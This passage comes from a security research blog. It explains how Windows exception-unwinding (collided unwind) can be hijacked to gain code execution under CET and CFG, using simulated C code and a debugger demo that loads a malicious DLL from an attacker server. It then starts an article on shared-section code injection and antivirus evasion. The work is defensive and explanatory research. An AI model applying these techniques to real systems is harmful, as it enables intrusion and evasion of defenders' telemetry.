modify:</p><!--kg-card-begin: markdown--><ol>
<li>We can call any function anywhere we want (via <code>LanguageHandler</code>) with the second argument (<code>RDX</code>/<code>EstablisherFrame</code>) completely controlled.</li>
<li>When <code>RtlVirtualUnwind</code> is called following the <code>ExceptionCollidedUnwind</code> result, we have full control over the <code>ControlPc</code>, <code>ImageBase</code>, <code>RUNTIME_FUNCTION</code> structure, and <code>UNWIND_INFO</code> structure it uses.
<ul>
<li>This means we can execute any unwind operations we want. We&apos;ll talk more about how this can be abused in practice later.</li>
</ul>
</li>
<li>If we meet certain conditions (discussed later) and specify an exception handler that returns <code>EXCEPTION_CONTINUE_SEARCH</code>, we can continuously hijack the dispatching/unwinding process since we control the <code>UNWIND_HISTORY_TABLE</code> structure.
<ul>
<li>The history table is used as a cache to store previously retrieved <code>RUNTIME_FUNCTION</code> entries. By creating a malicious history table, we can specify our own <code>RUNTIME_FUNCTION</code> structure for any function we know the location of.</li>
</ul>
</li>
<li>If we set <code>LanguageHandler</code> to the C-specific exception handler in ntdll, we can define a custom <code>SCOPE_TABLE</code> structure to call any ntdll functions we want <em>consecutively</em> (as long as the functions return 0).</li>
</ol>
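<p>To make point 4 concrete, here is a minimal, self-contained C simulation of the scope-table search loop (the structure and filter signature are simplified stand-ins chosen for illustration, not the real ntdll definitions). Because a filter returning zero means &quot;continue the search&quot;, overlapping scope records let every filter run back-to-back:</p><pre><code class="language-c">#include &lt;assert.h&gt;

/* Simplified stand-in for a scope record; the real structure stores
   HandlerAddress as an RVA rather than a function pointer. */
typedef struct _FAKE_SCOPE_RECORD {
    unsigned BeginAddress;                  /* start of protected region   */
    unsigned EndAddress;                    /* end of protected region     */
    int (*Filter)(void *EstablisherFrame);  /* stand-in for HandlerAddress */
} FAKE_SCOPE_RECORD;

static int g_calls;
static int filter_a(void *frame) { (void)frame; g_calls++; return 0; }
static int filter_b(void *frame) { (void)frame; g_calls++; return 0; }
static int filter_c(void *frame) { (void)frame; g_calls++; return 0; }

/* Mimics the C-specific handler's search loop: zero keeps enumerating,
   negative dismisses the exception, positive unwinds to the target. */
static int search_scope_table(FAKE_SCOPE_RECORD *records, unsigned count,
                              unsigned controlPcRva, void *establisherFrame)
{
    for (unsigned i = 0; i &lt; count; i++) {
        if (controlPcRva &gt;= records[i].BeginAddress &amp;&amp;
            controlPcRva &lt; records[i].EndAddress) {
            int value = records[i].Filter(establisherFrame);
            if (value &lt; 0) return -1; /* ExceptionContinueExecution */
            if (value &gt; 0) return 1;  /* unwind to the jump target  */
        }
    }
    return 0; /* ExceptionContinueSearch */
}

int main(void)
{
    /* Three records deliberately covering the same scope. */
    FAKE_SCOPE_RECORD table[] = {
        { 0x1000, 0x2000, filter_a },
        { 0x1000, 0x2000, filter_b },
        { 0x1000, 0x2000, filter_c },
    };
    assert(search_scope_table(table, 3, 0x1500, 0) == 0);
    assert(g_calls == 3); /* every filter was invoked consecutively */
    return 0;
}
</code></pre><p>In the real attack, each &quot;filter&quot; would be an ntdll function returning <code>STATUS_SUCCESS</code> (zero), which is exactly why zero-returning functions are so valuable here.</p>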
<!--kg-card-end: markdown--><p>Enough about what we <em>can</em> do; let&apos;s go through a practical example!</p><h2 id="planning-our-attack">Planning Our Attack</h2><p>To leverage this primitive in a stack overflow attack, we need to meet two major requirements:</p><ol><li>We need to know the location of ntdll.</li><li>We need to know the location of attacker-controlled memory. This memory can be anywhere in the process.</li></ol><p>Although we have significant control over the unwinding process, we still have many quirks and challenges to overcome. To best describe these limitations, I&apos;ll explain what occurs in <code>RtlDispatchException</code> when the <code>ExceptionCollidedUnwind</code> result is returned.</p><!--kg-card-begin: markdown--><ol>
<li>The <code>ControlPc</code>, <code>ImageBase</code>, <code>FunctionEntry</code>, and <code>ContextRecord</code> variables in <code>RtlDispatchException</code> are updated to attacker-controlled values.
<ul>
<li>The only variable we haven&apos;t explicitly covered is <code>ControlPc</code>, which represents the current <code>Rip</code> value. During each step in the unwinding process, this is updated to the return address from the call stack.</li>
</ul>
</li>
<li><code>RtlVirtualUnwind</code> is called. As an attacker, we have complete control over the runtime function and unwind info structures used for the virtual unwind.
<ul>
<li>This means we can specify any unwind operations we want. Note that the <code>Rsp</code> register in our context record must be a valid pointer no matter what, although it doesn&apos;t need to point at the stack (i.e. it could point at our controlled memory).</li>
<li>These unwind operations are incredibly powerful. For example, we can easily chain arbitrary reads by setting <code>Rsp</code> to some offset inside of ntdll and leveraging <code>UWOP_PUSH_NONVOL</code> to read an address from <code>Rsp</code>, <code>UWOP_ALLOC_*</code> to increment <code>Rsp</code> by any offset, etc.</li>
<li>At the end of this virtual unwind, our <code>Rsp</code> and <code>Rip</code> registers in the context record are updated. By default, <code>Rip</code> is read by dereferencing <code>Rsp</code>, and <code>Rsp</code> is incremented depending on the unwind operations (not true in cases like <code>UWOP_PUSH_MACHFRAME</code>).</li>
<li>If <code>Rip</code> matches the current <code>ControlPc</code>, the unwinding process is halted because it is assumed the stack is corrupted.</li>
</ul>
</li>
<li>Once the virtual unwind is complete, the <code>EstablisherFrame</code>, <code>HandlerData</code>, <code>ExceptionRoutine</code>, and <code>HistoryTable</code> are all updated to attacker-controlled values.</li>
<li>The exception handler loop continues and the function we specified in <code>LanguageHandler</code> is called. The first argument (<code>RCX</code>) is a pointer to the exception record, the second argument (<code>RDX</code>) is the establisher frame we control entirely, the third argument (<code>R8</code>) is a pointer to the context record, and the fourth argument (<code>R9</code>) is a pointer to the dispatcher context structure.</li>
<li>The return value of this function is checked again.
<ul>
<li>If the result is <code>ExceptionContinueExecution</code>, execution continues where the exception occurred.</li>
<li>If the result is <code>ExceptionContinueSearch</code>, the search for an exception handler continues.</li>
<li>If the result is <code>ExceptionNestedException</code>, then the exception flags are updated and the search continues.</li>
<li>If the result is <code>ExceptionCollidedUnwind</code>, we start over from step 1.</li>
<li>Any other result leads to a non-continuable exception. This effectively means that any exception routine you specify must return either 1 or 2 to ensure the search is continued.</li>
</ul>
</li>
<li>If the search is continued, our first major challenge occurs. The <code>Rsp</code> value in our context record is validated to be within the low/high limits of the stack.
<ul>
<li>I&apos;ll talk about a complex way we can pass this check in a later section.</li>
</ul>
</li>
<li><code>ControlPc</code> is updated to <code>Rip</code>, and the unwind loop continues assuming <code>Rsp</code> is in the stack&apos;s bounds.</li>
<li>At the beginning of the loop, <code>ControlPc</code> and our controlled <code>HistoryTable</code> are passed to <code>RtlLookupFunctionEntry</code> to find a corresponding runtime function entry.
<ul>
<li>Since we control the history table, if we can predict the value of <code>ControlPc</code>, we can define our own <code>ImageBase</code> and <code>RUNTIME_FUNCTION</code> pointers.</li>
</ul>
</li>
<li><code>RtlVirtualUnwind</code> is called again and practically the same logic we mentioned in step 2 occurs. The significant differences worth mentioning are:
<ul>
<li>The <code>EstablisherFrame</code> is updated to the value of <code>Rsp</code>. If the <code>FrameRegister</code> field in the unwind info structure is populated, it is instead set to the value of that register (minus <code>0x10</code> * the <code>FrameOffset</code> field).</li>
<li>If the <code>UNW_FLAG_EHANDLER</code> flag is set, the <code>ExceptionRoutine</code> is calculated by adding the <code>ExceptionHandler</code> field from the unwind info structure to the <code>ImageBase</code>.</li>
</ul>
</li>
<li>After this virtual unwind comes our second major challenge: <code>EstablisherFrame</code> is validated to be within the bounds of the stack.
<ul>
<li>During the first loop, <code>Rsp</code> must have already been a value that points at the stack; hence <code>EstablisherFrame</code> would likely be updated to that valid stack pointer.</li>
<li>The problem is that we no longer have arbitrary control over the second argument to the exception handler. Any <code>RDX</code> value we specify must be within the stack&apos;s low/high limits (also stored on the stack).</li>
</ul>
</li>
<li>Assuming an exception handler was defined, the logic from step 3 starts over again.</li>
</ol>
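<p>Steps 1 through 5 above boil down to one state swap followed by an attacker-chosen call. The following self-contained C sketch simulates that flow (the structure is a simplified stand-in for <code>DISPATCHER_CONTEXT</code>, not the real ntdll definition):</p><pre><code class="language-c">#include &lt;assert.h&gt;
#include &lt;string.h&gt;

/* Attacker-controlled stand-in for DISPATCHER_CONTEXT (simulation only). */
typedef struct {
    unsigned long long ControlPc;
    unsigned long long ImageBase;
    unsigned long long EstablisherFrame;
    int (*LanguageHandler)(unsigned long long establisherFrame);
} FAKE_DISPATCHER_CONTEXT;

enum { ExceptionContinueSearch = 1, ExceptionCollidedUnwind = 3 };

static FAKE_DISPATCHER_CONTEXT *g_saved; /* the pointer saved on the stack */

/* Mimics RtlpUnwindHandler: copy the saved context over the live one. */
static int fake_unwind_handler(FAKE_DISPATCHER_CONTEXT *live)
{
    memcpy(live, g_saved, sizeof(*live));
    return ExceptionCollidedUnwind;
}

static unsigned long long g_handler_arg;
static int attacker_routine(unsigned long long frame)
{
    g_handler_arg = frame;          /* RDX is fully attacker-chosen   */
    return ExceptionContinueSearch; /* keep the dispatch loop running */
}

int main(void)
{
    /* Attacker's replacement state, e.g. sitting in a known heap buffer. */
    FAKE_DISPATCHER_CONTEXT evil = { 0x1000, 0x7ff600000000ull,
                                     0xdeadbeefull, attacker_routine };
    g_saved = &amp;evil;

    FAKE_DISPATCHER_CONTEXT live = { 0 };

    /* Step 1: the handler replaces the dispatcher's state wholesale... */
    assert(fake_unwind_handler(&amp;live) == ExceptionCollidedUnwind);
    assert(live.ControlPc == 0x1000);

    /* Step 4: ...and the loop calls the attacker's LanguageHandler. */
    assert(live.LanguageHandler(live.EstablisherFrame) == ExceptionContinueSearch);
    assert(g_handler_arg == 0xdeadbeefull);
    return 0;
}
</code></pre><p>The takeaway: once the saved pointer on the stack is ours, every field the dispatch loop reads next is ours too.</p>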
<!--kg-card-end: markdown--><p>As a reminder, you can read the source code for all of this logic <a href="https://github.com/smartmaster/wrk-msvc/blob/master/BASE/NTOS/RTL/AMD64/EXDSPTCH.C#L114">in the leaked WRK</a>.</p><p>The most significant barrier to simply looping over and over again, calling a different exception handler of our choice each time, is that after the initial <code>ExceptionCollidedUnwind</code> result is handled, we quickly lose control over the second argument <em>and</em> we need to somehow guarantee that <code>Rsp</code> is within the bounds of the stack.</p><p>Of course, this is easy if the attacker-controlled memory you know the location of is the stack. But requiring the location of attacker-controlled memory <strong>and</strong> requiring that it is on the stack is lame. This is quite a powerful primitive; we should be able to perform this attack regardless of whether our controlled memory is in the stack, the heap, or anywhere else.</p><p>Initially, I spent ~2 weeks developing a complex exploit chain to execute arbitrary shellcode without needing to step outside the bounds of the unwinding process. It worked with CET and CFG in strict mode but had some stability issues. What I realized during this process was that I had discovered several powerful primitives, such that if our goal was only to execute code remotely, there were much simpler (and more stable) methods of gaining arbitrary code execution. Let&apos;s discuss using some of these primitives to create a stable proof-of-concept to execute arbitrary code.</p><h3 id="allowing-functions-to-return-zero">Allowing Functions to Return Zero</h3><p>A frustrating challenge I faced while writing an exploit was that any exception handler I called had to return 1 (<code>ExceptionContinueSearch</code>) or 2 (<code>ExceptionNestedException</code>). 
Returning 3 (<code>ExceptionCollidedUnwind</code>) would cause an infinite loop, as the dispatcher would keep calling the same function repeatedly (since the dispatcher context would remain the same).</p><pre><code class="language-c++">                } else {
                    ExceptionFilter =
                        (PEXCEPTION_FILTER)(ScopeTable-&gt;ScopeRecord[Index].HandlerAddress + ImageBase);
                    Value = (ExceptionFilter)(&amp;ExceptionPointers, EstablisherFrame);
                }
                //
                // If the return value is less than zero, then dismiss the
                // exception. Otherwise, if the value is greater than zero,
                // then unwind to the target exception handler. Otherwise,
                // continue the search for an exception filter.
                //
                if (Value &lt; 0) {
                    return ExceptionContinueExecution;
                } else if (Value &gt; 0) {
	                // RtlUnwind is called.
	                ...
	            }
		        // Loop continues.
	...
	// Eventually, ExceptionContinueSearch is returned.
	return ExceptionContinueSearch;
</code></pre><p>While reading the code for the <code>__C_specific_handler</code>, which is included with the MSVCRT (<code>C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\crt\src\amd64\chandler.c</code>), I discovered that if the exception filter it called returned zero, it would continue enumerating the scope table.</p><p>This meant we could call arbitrary functions by setting our exception handler to <code>__C_specific_handler</code> and crafting a malicious scope table. As long as the return value of our fake exception filter was zero, our search would continue without issue. Given that many functions in the ntdll module return an <code>NTSTATUS</code> value and <code>STATUS_SUCCESS</code> is zero, this significantly increased the number of functions we could call.</p><h3 id="execute-multiple-exception-handlers-consecutively">Execute Multiple Exception Handlers Consecutively</h3><p>The following primitive was found quickly after the last: the ability to execute as many functions as I wanted consecutively inside a module I knew the location of. If you think about the <code>RtlDispatchException</code> unwinding process, it may seem that, to call multiple functions, we&apos;d need to perform an entire unwind loop to specify each new exception routine pointer.</p><pre><code class="language-c">typedef struct _SCOPE_TABLE_AMD64 {
    DWORD Count;
    struct {
        DWORD BeginAddress;
        DWORD EndAddress;
        DWORD HandlerAddress;
        DWORD JumpTarget;
    } ScopeRecord[1];
} SCOPE_TABLE_AMD64, *PSCOPE_TABLE_AMD64;
</code></pre><p>With a malicious scope table structure, we can define multiple scope records that <strong>overlap</strong>. Nothing stops the <code>BeginAddress</code>/<code>EndAddress</code> fields from specifying the same scope. As long as our exception filters (handler address) return zero, the table is entirely enumerated, and we can call functions consecutively. One relevant limitation is that we are stuck with the same second argument (<code>RDX</code>) value across all consecutive function calls.</p><h3 id="what-functions-do-we-call">What Functions Do We Call?</h3><p>The collided unwind primitive is certainly powerful, but what functions can we call to get remote code execution while controlling only the second argument?</p><p>Even though we don&apos;t control the other arguments entirely, they&apos;re worth calling out. For example, the fact that the first argument (<code>RCX</code>) will be a consistent pointer to some writable memory region can still be helpful.</p><p>I discovered most of the valuable functions we can abuse for this attack by spending hours reviewing published headers for ntdll. For example, two great resources I used were the <a href="https://github.com/processhacker/phnt">Process Hacker Native API header collection</a> and the <a href="https://github.com/reactos">source code of ReactOS</a>. What I did with these headers was use the return type and SAL annotations, which specify whether arguments are written to or are used as input, to find potentially &quot;desirable&quot; functions.</p><p>For example, if a function&apos;s return type was <code>NTSTATUS</code>, a zero return value was guaranteed as long as the function succeeded. SAL annotations let me search for functions that met specific criteria like &quot;find functions where the second argument I control is written to&quot;.</p><p>It&apos;s not worth going through every function I found potentially valuable, as there were quite a lot. 
So instead, I&apos;ll focus on those we leverage in our minimal PoC.</p><h4 id="rtlinitunicodestringex">RtlInitUnicodeStringEx</h4><pre><code class="language-c">NTSTATUS
NTAPI
RtlInitUnicodeStringEx(
    _Out_ PUNICODE_STRING DestinationString,
    _In_opt_z_ PCWSTR SourceString
    );
</code></pre><p>The first function I want to call out is <code>RtlInitUnicodeStringEx</code>, which takes our completely controlled second argument and initializes a <code>UNICODE_STRING</code> structure in the buffer specified by the first argument.</p><p>Remember how I said the fact that <code>RCX</code> was a writable location is still helpful? In the context of the <code>__C_specific_handler</code>, the first argument is an <code>EXCEPTION_POINTERS</code> structure which contains our exception and context record pointers. Fortunately, it doesn&apos;t matter what is stored initially, as <code>RtlInitUnicodeStringEx</code> doesn&apos;t care.</p><p>I couldn&apos;t use <code>RtlInitUnicodeString</code> because it leverages the <code>RAX</code> register (return value) as a &quot;counter&quot; representing the number of characters written, and we needed a return value of zero. <code>RtlInitUnicodeStringEx</code>, on the other hand, wraps this call and returns zero as long as our source string is not larger than <code>SHRT_MAX</code>.</p><p>This function lets us initialize <code>RCX</code> to point to a <code>UNICODE_STRING</code> containing whatever value we want. Many functions inside ntdll accept a <code>UNICODE_STRING</code> pointer; hence this was useful for expanding the accessible attack surface.</p><h4 id="ldrloaddll">LdrLoadDll</h4><p>What do we do with a <code>UNICODE_STRING</code>? One interesting attack idea I had was, &quot;if all we want to do is execute arbitrary code remotely, does it really need to be shellcode?&quot;. For example, what&apos;s stopping us from loading a malicious DLL from our remote server?</p><pre><code class="language-c">NTSTATUS
NTAPI
LdrpLoadDll(
    PUNICODE_STRING DllName,
    PVOID DllPathState,
    ULONG Flags,
    PLDR_MODULE* ModuleOut
    );
</code></pre><p><code>LdrLoadDll</code> wouldn&apos;t work directly as the <code>DllPath</code> needed to be a <code>PWSTR</code>, but all <code>LdrLoadDll</code> did was wrap a call to <code>LdrpLoadDll</code>, which <strong>did</strong> accept a <code>UNICODE_STRING</code> as its first argument.</p><p>Although this initially seemed like a good candidate, I ran into several issues during testing. So, to make my life easier, I created a test program that would emulate the conditions inside <code>__C_specific_handler</code>. For example, I called <code>RtlInitUnicodeStringEx</code> on a heap buffer containing random data, and I passed two arbitrary heap pointers in the <code>Flags</code> and <code>ModuleOut</code> arguments.</p><p><code>Flags</code> being a pointer complicated things as different heap addresses would trigger different logic inside <code>LdrpLoadDll</code>. I had similar issues with the <code>DllPathState</code> containing a wide string.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/Xh9tDLX.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>Looking for alternatives, I used IDA Pro to check for cross-references to <code>LdrpLoadDll</code>. To my surprise, I found a function named <code>LdrpLoadWow64</code> which took a single <code>UNICODE_STRING</code> argument. 
At a high level, the function:</p><ol><li>Copies the <code>UNICODE_STRING</code> argument into a stack buffer.</li><li>Appends <code>wow64.dll</code> to this stack buffer.</li><li>Uses <code>LdrpInitializeDllPath</code> on the stack buffer, which &quot;normalizes&quot; a given path for <code>LdrpLoadDll</code>.</li><li>Calls <code>LdrpLoadDll</code> to load the DLL from the finalized path.</li></ol><p>There are a few more operations this function does after the DLL is loaded, such as trying to parse certain exports, but that doesn&apos;t matter if we can get our arbitrary DLL loaded.</p><p>This appeared to be a great candidate because it took care of all the strange arguments <code>LdrpLoadDll</code> took, which we had little control over. If we could initialize <code>RCX</code> with a path to a malicious directory, <code>LdrpLoadWow64</code> would append <code>wow64.dll</code> to it and load a DLL from that path!</p><h2 id="preparing-the-demo">Preparing the Demo</h2><p>For the demo, I developed a sample &quot;vulnerable application&quot; compiled using Visual Studio&apos;s Clang/LLVM build tools. This example program has a small network protocol designed to fulfill our requirements for the attack:</p><ol><li>The application allows a remote caller to request a leak of the <code>ntdll</code> base address and a pointer to a heap region allocated with a caller-specified size.</li><li>The application allows a remote caller to provide an arbitrary buffer to copy into the previously allocated heap buffer.</li><li>The application allows a remote caller to provide an arbitrary buffer to unsafely copy into a stack variable and then trigger an access violation exception.</li></ol><p>Obviously, the requirements for this attack will be more complex in the real world. The method by which you meet the requirements will change depending on the context of the application you are exploiting. 
Therefore, in our sample PoC, these primitives are accessible through a simple interface, allowing us to focus on the unwinding process.</p><p>To perform the attack, I created a small Python script requiring a target IP and several offsets of functions inside your target&apos;s ntdll. Note that this exploit code was written to work against any target application, not just the one we developed for this demo. Of course, you would need to implement code to fulfill the requirements for the attack, but the nice part of the <code>LdrpLoadWow64</code> methodology is that it is stable across different versions of Windows.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/4VHldOn.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>To up the stakes, I configured my target&apos;s &quot;Exploit Protection&quot; settings to require strict control flow guard and strict hardware-enforced stack protection. Given that our exploit never needs to return to a value that isn&apos;t on the shadow stack, this shouldn&apos;t cause issues, but it&apos;s always better to confirm these assumptions.</p><h2 id="demo">Demo</h2><p>We start the demo by running the vulnerable application on our victim machine. To show you the attack step-by-step, I&apos;m using IDA Pro remote debugging with WinDbg. 
After setting relevant breakpoints, we can start the exploit script on our remote attacker machine.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/CoorhBH.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>The PoC requests a leak for <code>ntdll</code> and some heap memory, copies the malicious heap buffer to the target, and triggers the overflow.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/TpfsGVN.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>On our victim side, we can see an exception occurring inside the <code>ProcessPacket</code> function after the overflow buffer is overwritten as intended.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/gumgVGd.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>At this point, we can verify that hardware-enforced stack protection is enabled by running the WinDbg command <code>rM 8002</code>. This is a trick I learned from the <a href="https://security.googleblog.com/2021/05/enabling-hardware-enforced-stack.html">Google Security blog</a> discussing CET to see the shadow stack pointer (<code>ssp</code>) and whether CET is enabled (<code>cetumsr</code>). Since <code>cetumsr</code> is <code>1</code>, we know that our previous exploit protection option took effect.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/rjKdwBo.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>Once we pass this exception to the target, our corrupted call stack leads <code>RtlDispatchException</code> to call <code>RtlpUnwindHandler</code>, which is the exception handler for <code>RtlpExecuteHandlerForUnwind</code>. 
This is where the dispatcher context structure in <code>RtlDispatchException</code> is overwritten with our malicious dispatcher context pointer stored on the stack.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/F6p1uMH.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/w2GWmqG.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>Next, <code>__C_specific_handler</code> calls <code>RtlInitUnicodeStringEx</code>, which initializes the <code>ExceptionPointers</code> variable to a <code>UNICODE_STRING</code> pointing at the wide string we specified in our <code>EstablisherFrame</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/0pEkQvx.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/pD3y8hH.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>The last step of the attack is a call to <code>LdrpLoadWow64</code>. 
By dumping the unicode string in <code>RCX</code> right before the call to <code>LdrpLoadDll</code>, we can see that it has been initialized to our initial directory path + <code>wow64.dll</code>.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/T5NxTMo.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/VfcTqKn.png" class="kg-image" alt="Abusing Exceptions for Code Execution, Part 2" loading="lazy"></figure><p>Once we continue, we see the <code>wow64.dll</code> file being requested from our attacker server and a message box generated by our malicious DLL, completing the attack!</p><h2 id="what-else-can-we-do-with-this-attack">What Else Can We Do With This Attack?</h2><p>Although we&apos;ve gone through a minimal proof-of-concept, much more is possible with the <code>CollidedUnwind</code> primitive. Here are some highlights:</p><!--kg-card-begin: markdown--><ol>
<li>Using <code>__C_specific_handler</code>, we can trigger a call to <code>RtlUnwind</code> while controlling the function&apos;s internal state. <code>RtlUnwind</code> is more potent than <code>RtlDispatchException</code> as the changes you make to the context record will be reflected once execution continues at the unwind target.</li>
<li>In <code>RtlDispatchException</code>, a significant barrier to continuing the virtual unwind loop is that your <code>Rsp</code> must be within the stack&apos;s bounds. There are quite a few ways to get around this issue.
<ul>
<li>One method is to use unwind operations to read the <code>TlsExpansionBitmap</code> in ntdll, which contains a pointer to the PEB. From there, we can walk up to the TEB of our process and copy the <code>StackBase</code> or <code>StackLimit</code> field into <code>Rsp</code>, allowing us to pass the bounds check.</li>
</ul>
</li>
<li>Another challenge I faced with complex variants was that the unwind info structure referenced by <code>RUNTIME_FUNCTION</code> is located by adding a 32-bit offset to the image base we controlled. For us to call arbitrary exception handlers, the image base would need to be the base of ntdll. For us to entirely control the unwind info structure, the image base would need to be the base of our heap.
<ul>
<li>An interesting middle ground was that I could use any unwind info structure in ntdll to call any exception handler. This worked by subtracting the exception handler offset I didn&apos;t control from the address of the target exception handler I wanted to call. This new value became my fake image base, and I would specify an unwind info offset in my runtime function that accounts for the difference (i.e. the real unwind info location minus my fake image base).</li>
</ul>
</li>
</ol>
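<p>The arithmetic behind that middle ground can be sketched in a few lines of Python. All addresses and offsets below are hypothetical placeholders, not values taken from a real copy of ntdll:</p>

```python
# Hypothetical values for illustration only. Real ones would come from
# parsing ntdll's exception directory at runtime.
ntdll_base          = 0x7FFB1C000000
handler_rva         = 0x9F100               # handler RVA baked into the reused RUNTIME_FUNCTION
target_handler_va   = ntdll_base + 0xA2340  # handler we actually want invoked
real_unwind_info_va = ntdll_base + 0xD5000  # legitimate unwind info we keep using

# Choose the fake image base so that base + fixed handler RVA lands on the target.
fake_image_base = target_handler_va - handler_rva

# Compensate in the fake RUNTIME_FUNCTION's unwind info offset so the
# legitimate unwind info still resolves from the fake base.
unwind_info_offset = real_unwind_info_va - fake_image_base

assert fake_image_base + handler_rva == target_handler_va
assert fake_image_base + unwind_info_offset == real_unwind_info_va
```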
<!--kg-card-end: markdown--><h1 id="what-about-linux">What About Linux?</h1><p>We discussed how exception handling works on Windows and how we can weaponize structured exception handling to gain code execution. However, we didn&apos;t touch on how other operating systems like Linux are impacted by the same theory.</p><p>A few weeks ago, academic researchers from Vrije Universiteit Amsterdam and the University of California, Santa Barbara, released a paper titled, &quot;<em><a href="https://download.vusec.net/papers/chop_ndss23.pdf">Let Me Unwind That For You: Exceptions to Backward-Edge Protection</a></em>&quot;. Their paper complements this article exceptionally well as they investigated how an attacker can abuse the unwinding process, but with a strong Linux and C++ focus.</p><p>If you enjoyed this article, I strongly encourage you to check out their work.</p><h1 id="tools">Tools</h1><p>To access the tools and proof-of-concept mentioned in this article, please visit the <a href="https://github.com/D4stiny/ExceptionOrientedProgramming">Exception Oriented Programming repository</a>.</p><h1 id="conclusion">Conclusion</h1><p>In this article, we explored how an attacker can abuse fundamental weaknesses in the design of structured exception handling on Windows in the context of stack-based attacks. We started with the trivial approach to bypassing security cookies by triggering an exception into a handler that would return to our target. We investigated how although the MSVC compiler has mitigated this attack for fifteen years, much of the Windows ecosystem is still unprotected.</p><p>Next, we dove deep into the internals of the unwinding process on Windows, discovering how the unwind operations of legitimate functions can be weaponized by attackers to corrupt the state of an application. 
Finally, we discussed how Exception Oriented Programming is a compelling alternative to ROP when it comes to newer system mitigations such as hardware-enforced stack protection.</p><p>In our last section, we abused edge cases to achieve the modern-day equivalent of an SEH hijacking attack. We weaponized collided unwinds to gain code execution with strict hardware-enforced stack protection and control flow guard enabled.</p><p>I look forward to seeing if we can implement mitigations against these attacks in other compilers (and operating systems). There is quite a lot of opportunity to limit the attack surface currently exposed by the unwinding process, and I look forward to working with the broader compiler development community to see what can be done.</p><p>I hope you enjoyed reading this article as much as I enjoyed writing it. We covered a significant amount, and I appreciate those that stuck around.</p>]]></content:encoded></item><item><title><![CDATA[Sharing is Caring: Abusing Shared Sections for Code Injection]]></title><description><![CDATA[In this article, we will explore how to abuse certain quirks of PE Sections to place arbitrary shellcode into the memory of a remote process without requiring direct process access.]]></description><link>https://billdemirkapi.me/sharing-is-caring-abusing-shared-sections-for-code-injection/</link><guid isPermaLink="false">61da2c7aa39fe110b6ef5d19</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Mon, 04 Apr 2022 16:00:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2022/04/sharing_is_caring.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2022/04/sharing_is_caring.png" alt="Sharing is Caring: Abusing Shared Sections for Code Injection"><p>Moving laterally across processes is a common technique seen in malware in order to spread across a system. 
In recent years, Microsoft has moved towards adding security telemetry to combat this threat through the <a href="https://undev.ninja/introduction-to-threat-intelligence-etw/">&quot;Microsoft-Windows-Threat-Intelligence&quot; ETW provider</a>.</p><p>This increased telemetry alongside existing methods such as <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-obregistercallbacks">ObRegisterCallbacks</a> has made it difficult to move laterally without exposing malicious operations to kernel-visible telemetry. In this article, we will explore how to abuse certain quirks of PE Sections to place arbitrary shellcode into the memory of a remote process without requiring direct process access.</p><h1 id="background">Background</h1><p>Existing methods of moving laterally often involve dangerous API calls such as OpenProcess to gain a process handle accompanied by memory-related operations such as VirtualAlloc, VirtualProtect, or WriteProcessMemory. In recent years, the detection surface for these operations has increased.</p><p>For example, on older versions of Windows, one of the only cross-process API calls that kernel drivers had documented visibility into was the creation of process and thread handles via ObRegisterCallbacks.</p><p>The visibility introduced by Microsoft&#x2019;s threat intelligence ETW provider has expanded to cover operations such as:</p><ol><li>Read/Write virtual memory calls (<code>EtwTiLogReadWriteVm</code>).</li><li>Allocation of executable memory (<code>EtwTiLogAllocExecVm</code>).</li><li>Changing the protection of memory to executable (<code>EtwTiLogProtectExecVm</code>).</li><li>Mapping an executable section (<code>EtwTiLogMapExecView</code>).</li></ol><p>Other methods of entering the context of another process typically come with other detection vectors. 
For example, another method of moving laterally may involve disk-based attacks such as <a href="https://dl.packetstormsecurity.net/papers/win/intercept_apis_dll_redirection.pdf">Proxy Dll Injection</a>. The problem with these sorts of attacks is that they often require writing malicious code to disk, which is visible to kernel-based defensive solutions.</p><p>Since these visible operations are required by known methods of cross-process movement, one must start looking beyond existing methods for staying ahead of telemetry available to defenders.</p><h1 id="discovery">Discovery</h1><p>Recently I was investigating the extent to which you could corrupt a <a href="https://docs.microsoft.com/en-us/windows/win32/debug/pe-format">Portable Executable</a> (PE) binary without impacting its usability. For example, could you corrupt a known malicious tool such as <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a> to an extent that wouldn&apos;t impact its operability but would break the image parsers built into anti-virus software?</p><p>Similar to ELF executables in Linux, Windows PE images are made up of &quot;sections&quot;. For example, code is typically stored in a section called <code>.text</code>, mutable data can be found in <code>.data</code>, and read-only data is generally in <code>.rdata</code>. How does the operating system know which sections contain code or should be writable? Each section has &quot;characteristics&quot; that define how it is allocated.</p><p>There are over 35 <a href="https://docs.microsoft.com/en-us/windows/win32/debug/pe-format#section-flags">documented</a> characteristics for PE sections. The most common include 